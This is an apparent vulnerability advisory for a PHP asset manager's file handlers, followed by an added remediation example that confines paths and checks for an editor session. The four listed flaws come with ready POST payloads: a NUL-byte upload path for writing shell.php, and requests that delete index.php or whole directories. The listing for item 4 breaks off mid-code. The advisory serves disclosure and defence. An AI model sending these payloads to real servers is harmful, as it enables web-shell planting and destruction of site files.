1. Arbitrary file upload [magic_quotes_gpc = Off]
Vulnerable file: assetmanager.php
[POST] inpCurrFolder2=/var/www/shell.php%00
Vulnerable code (line 42):
if (isset($_FILES["File1"]))
{
    if (isset($_POST["inpCurrFolder2"])) $currFolder = $_POST['inpCurrFolder2']; // with magic_quotes_gpc = Off, the directory can be crafted so that an arbitrary file is written
    if (isset($_REQUEST["inpFilter"])) $ffilter = $_REQUEST["inpFilter"];
    if ($MaxFileSize && ($_FILES['File1']['size'] > $MaxFileSize))
    {
        $sMsg = "The file exceeds the maximum size allowed.";
    }
    else if (!isTypeAllowed($_FILES['File1']['name']))
    {
        $sMsg = "The File Type is not allowed.";
    }
    else if (move_uploaded_file($_FILES['File1']['tmp_name'], $currFolder . "/" . basename($_FILES['File1']['name'])))
    {
        $sMsg = "";
        $sUploadedFile = $_FILES['File1']['name'];
        @chmod($currFolder . "/" . basename($_FILES['File1']['name']), 0644);
    }
    else
    {
        $sMsg = "Upload failed.";
    }
}
-------------------
2. Arbitrary file deletion caused by missing access control
Vulnerable file: assetmanager.php
[POST] inpFileToDelete=/var/www/index.php
Vulnerable code (line 72):
if (isset($_POST["inpFileToDelete"]))
{
    $filename = pathinfo($_POST["inpFileToDelete"]);
    $filename = $filename['basename'];
    if ($filename != "")
        unlink($currFolder . "/" . $filename);
    $sMsg = "";
}
-------------------
3. Arbitrary directory deletion caused by missing access control
Vulnerable file: folderdel_.php
[POST] inpCurrFolder=/var/www/upload/
Vulnerable code (line 3):
if (isset($_POST["inpCurrFolder"]))
{
    $sDestination = pathinfo($_POST["inpCurrFolder"]);
    // DELETE ALL FILES IF FOLDER NOT EMPTY
    $dir = $_POST["inpCurrFolder"];
    $handle = opendir($dir);
    while ($file = readdir($handle)) if ($file != "." && $file != "..") unlink($dir . "/" . $file);
    closedir($handle);
    if (rmdir($_POST["inpCurrFolder"]) == 0)
        $sMsg = "";
    else
        $sMsg = "<script>document.write(getTxt('Folder deleted.'))</script>";
}
-------------------
4. Arbitrary directory creation caused by missing access control
Vulnerable file: foldernew.php
[POST] inpCurrFolder=/var/www/&inpNewFolderName=123
Vulnerable code (line 3):
if (isset($_POST["inpNewFolderName"]))
{
    $sFolder = $_POST["inpCurrFolder"] . "/" . $_POST["inpNewFolderName"];
    if (is_dir($sFolder) == 1)
    { // Folder already exists
        $sMsg = "<script>document.write(getTxt('Folder already exists.'))</script>";
    }
    else
    {
        // if (mkdir($sFolder))
        if (mkdir($sFolder, 0755))
From: Love Letter
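
One way to close the root cause shared by issues 1 to 4 (a client-supplied path used directly, with no session check), as an added example that is not part of the original report or of the editor's own code. The upload root, the `is_editor` session flag and both function names are assumptions.

```php
<?php
// Added example, not the editor's own code. The upload root, the session
// flag 'is_editor' and both function names are assumptions.

// Return the canonical path of $userFolder if it is an existing directory
// at or below $root, otherwise null.
function confine_folder(string $root, string $userFolder): ?string
{
    if (strpos($userFolder, "\0") !== false) {
        return null;                    // NUL byte, as in shell.php%00
    }
    $rootReal = realpath($root);
    $real     = realpath($userFolder);  // resolves ".." and symlinks
    if ($rootReal === false || $real === false || !is_dir($real)) {
        return null;
    }
    // Compare with a trailing separator so "<root>_other" does not pass.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $inside = strncmp($real . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) === 0;
    return $inside ? $real : null;
}

// Delete one file, only for a logged-in editor and only inside $root.
function delete_asset(array $session, string $root, string $folder, string $file): string
{
    if (empty($session['is_editor'])) {
        return 'denied: no editor session';
    }
    $dir  = confine_folder($root, $folder);
    $name = basename($file);            // drop any directory part
    if ($dir === null || $name === '' || strpos($name, "\0") !== false) {
        return 'denied: outside upload root';
    }
    $target = $dir . DIRECTORY_SEPARATOR . $name;
    return (is_file($target) && unlink($target)) ? 'deleted' : 'not found';
}

// Constructed demo data: a temporary upload root holding one file.
$root = sys_get_temp_dir() . '/am_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/images', 0755, true);
file_put_contents($root . '/images/a.png', 'x');
$editor = ['is_editor' => true];

echo delete_asset([], $root, $root . '/images', 'a.png'), "\n";
echo delete_asset($editor, $root, $root . '/images/../..', 'a.png'), "\n";
echo delete_asset($editor, $root, "/var/www/shell.php\0", 'a.png'), "\n";
echo delete_asset($editor, $root, $root . '/images', '../a.png'), "\n";
rmdir($root . '/images');
rmdir($root);
```

The same `confine_folder` check applies to the `inpCurrFolder2` upload target and to the `inpCurrFolder` value handled by folderdel_.php and foldernew.php.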